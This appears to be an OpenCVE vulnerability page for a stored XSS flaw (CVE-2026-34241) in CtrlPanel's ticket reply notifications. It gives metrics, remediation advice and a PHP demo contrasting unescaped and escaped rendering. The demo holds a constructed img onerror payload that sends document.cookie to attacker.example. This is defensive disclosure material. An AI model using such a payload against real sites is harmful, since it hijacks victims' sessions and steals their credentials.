Description
CtrlPanel is open-source billing software for hosting providers. Versions 1.1.1 and prior contain a Stored Cross-Site Scripting (XSS) vulnerability in the ticket reply notification system. Unsanitized reply content ($newmessage) is stored directly in database notification payloads and later rendered unescaped via Blade's {!! !!} syntax in the recipient's browser. The flaw exists in both App\Notifications\Ticket\Admin\AdminReplyNotification (triggered when a user replies, targeting admins) and App\Notifications\Ticket\User\ReplyNotification (triggered when an admin replies, targeting users), allowing arbitrary JavaScript execution in the victim's session context. A low-privileged attacker can exploit this to hijack admin sessions, harvest credentials via fake login prompts or keyloggers, and escalate privileges by performing administrative actions on the victim's behalf. The reverse path also enables a malicious or compromised admin to target regular users in the same manner. This issue has been fixed in version 1.2.0.
Published: 2026-05-19
Score: 8.7 High
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

This vulnerability is a stored cross-site scripting flaw in the ticket reply notification system of CtrlPanel. Unsanitized reply content is written into the database notification payload and later rendered through Blade's unescaped {!! !!} syntax, so an attacker can inject arbitrary JavaScript that executes in the recipient's browser session. The executed script can hijack administrative sessions, harvest credentials with fake login prompts or keyloggers, and perform admin actions on behalf of the victim. The flaw exists in both the user-to-admin and the admin-to-user notification, so a low-privileged user can escalate to admin through session takeover, and a malicious or compromised admin can target regular users the same way.

Affected Systems

CtrlPanel Open‑Source billing software, version 1.1.1 and earlier. The affected components are the ticket reply notification classes for admins and users. Only installations that have not applied the 1.2.0 update remain vulnerable.

Risk and Exploitability

The CVSS 3.1 vector (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N) yields a score of 8.7 (High): the attack is reachable over the network with low complexity, needs only a low-privileged account (any user who can reply to a ticket), requires user interaction (the recipient must view the notification that carries the payload), and changes scope because the script runs in the recipient's browser with that session's authority. EPSS puts the probability of exploitation in the wild below 1%, and the CVE is not listed in the CISA KEV catalog, so no in-the-wild exploitation is known; the SSVC assessment recorded in the history section, however, marks Exploitation as "poc", meaning a proof of concept exists. The attack path is the ticket reply form: the attacker stores the payload in a reply, and it executes when an admin opens the resulting notification. Because the required privilege is low and the payload acts with the victim's session, the flaw is a practical privilege-escalation route on any instance that lets customers open tickets, even though mass exploitation is unlikely.

Generated by OpenCVE AI on May 19, 2026 at 22:20 UTC.

Remediation

Fixed in CtrlPanel 1.2.0, as stated in the CVE description. No separate vendor workaround is published on this page.

OpenCVE Recommended Actions

  • Upgrade CtrlPanel to version 1.2.0 or later.
  • If an upgrade is not possible, escape the reply content where the notification is rendered (Blade's {{ }} instead of {!! !!}) or sanitise it against an HTML allow-list before it is stored. Escaping on output is the more reliable of the two, because it also neutralises payloads already sitting in the database.
  • Deploy a Content Security Policy whose script-src omits 'unsafe-inline' so inline scripts and event handlers cannot run, and set HttpOnly and SameSite on the session cookie to limit cookie theft. These only reduce impact: an injected script can still drive the application with the victim's session, so they do not replace the fix, and transport encryption such as HTTPS has no effect on a stored XSS.
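The pattern the Description names (raw reply text stored in the notification payload, then rendered with {!! !!}) and the escape-on-output and CSP measures in the list above, shown side by side in plain PHP. This is an added illustration, not CtrlPanel's or Laravel's code: buildPayload(), renderRaw(), renderEscaped(), containsActiveMarkup() and cspHeader() are names invented here, the attacker reply and the host attacker.example are constructed, and e() re-implements the escaping Laravel applies behind {{ }} so the script runs without the framework. It needs only a stock PHP CLI with the DOM extension.

```php
<?php
// Added illustration, not CtrlPanel's own code. Reproduces the advisory's
// pattern (raw reply stored in a notification payload, rendered unescaped)
// beside the escaped form. Function names are this example's own.

declare(strict_types=1);

// Constructed attacker reply: what a low-privileged user could post to a ticket.
const MALICIOUS_REPLY = "<img src=x onerror=\"fetch('https://attacker.example/c?' + document.cookie)\">";

// Mirrors what a notification's toArray()/toDatabase() does in the vulnerable
// pattern: the raw reply text lands in the JSON payload column untouched.
function buildPayload(string $ticketId, string $newmessage): array
{
    return [
        'title'   => "New reply on ticket $ticketId",
        'content' => $newmessage,   // stored verbatim, no sanitisation
    ];
}

// Same escaping Laravel's e() helper applies behind {{ ... }}.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Equivalent of a Blade view using {!! $payload['content'] !!}: markup and
// event handlers in the stored text become live HTML in the recipient's browser.
function renderRaw(array $payload): string
{
    return '<div class="notification"><h4>' . $payload['title'] . '</h4>'
         . '<p>' . $payload['content'] . '</p></div>';
}

// Equivalent of the same view using {{ ... }}: the payload is shown as text.
function renderEscaped(array $payload): string
{
    return '<div class="notification"><h4>' . e($payload['title']) . '</h4>'
         . '<p>' . e($payload['content']) . '</p></div>';
}

// Regression check for the fix: parse the rendered HTML and look for script-
// bearing elements or on* event-handler attributes. Parsing rather than
// grepping matters: the escaped output still contains the text "onerror=",
// but as character data, not as an attribute.
function containsActiveMarkup(string $html): bool
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);   // tolerate fragment-level parse warnings
    $doc->loadHTML('<?xml encoding="UTF-8"><body>' . $html . '</body>');
    libxml_clear_errors();
    foreach ($doc->getElementsByTagName('*') as $el) {
        if (in_array(strtolower($el->tagName), ['script', 'iframe', 'object', 'embed'], true)) {
            return true;
        }
        foreach ($el->attributes as $attr) {
            if (stripos($attr->name, 'on') === 0) {   // onerror=, onload=, ...
                return true;
            }
        }
    }
    return false;
}

// Defence in depth: a CSP with no 'unsafe-inline' in script-src, so an inline
// handler that slips past escaping is refused by the browser. The source list
// is a placeholder; adjust it to what the deployment actually loads.
function cspHeader(): string
{
    return "Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'";
}

$payload = buildPayload('42', MALICIOUS_REPLY);
$raw     = renderRaw($payload);
$safe    = renderEscaped($payload);

echo "Raw render ({!! !!}, vulnerable):\n$raw\n\n";
echo "Escaped render ({{ }}, fixed):\n$safe\n\n";
echo 'Active markup in raw render:     ' . var_export(containsActiveMarkup($raw), true) . "\n";
echo 'Active markup in escaped render: ' . var_export(containsActiveMarkup($safe), true) . "\n";
echo cspHeader() . "\n";
```

Run it with `php xss_demo.php`: the raw render reports true and the escaped render false. In a Laravel application the CSP string would be sent from middleware rather than echoed, and the check belongs in a feature test that posts a reply and asserts on the notification view. The exact change shipped in 1.2.0 is not shown on this page; switching the view to {{ }} is one fix consistent with the description.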


Advisories

No advisories yet.

History

Wed, 20 May 2026 14:30:00 +0000

Type: Metrics
Values removed: (none)
Values added: ssvc {'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Wed, 20 May 2026 11:45:00 +0000

Type: First Time appeared
Values removed: (none)
Values added: Ctrlpanel-gg; Ctrlpanel-gg panel

Type: Vendors & Products
Values removed: (none)
Values added: Ctrlpanel-gg; Ctrlpanel-gg panel

Tue, 19 May 2026 21:30:00 +0000

Type: Description
Values removed: (none)
Values added: the CVE description shown at the top of this page

Type: Title
Values removed: (none)
Values added: CtrlPanel: Stored XSS in Ticket Reply Notifications Allows Session Hijacking

Type: Weaknesses
Values removed: (none)
Values added: CWE-79

Type: References
Values removed: (none)
Values added: (none shown)

Type: Metrics
Values removed: (none)
Values added: cvssV3_1 {'score': 8.7, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-05-20T14:08:56.728Z

Reserved: 2026-03-26T16:22:29.034Z

Link: CVE-2026-34241

Vulnrichment

Updated: 2026-05-20T14:08:47.529Z

NVD

Status: Deferred

Published: 2026-05-19T22:16:37.297

Modified: 2026-05-20T16:16:25.253

Link: CVE-2026-34241

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-05-20T10:38:57Z

Weaknesses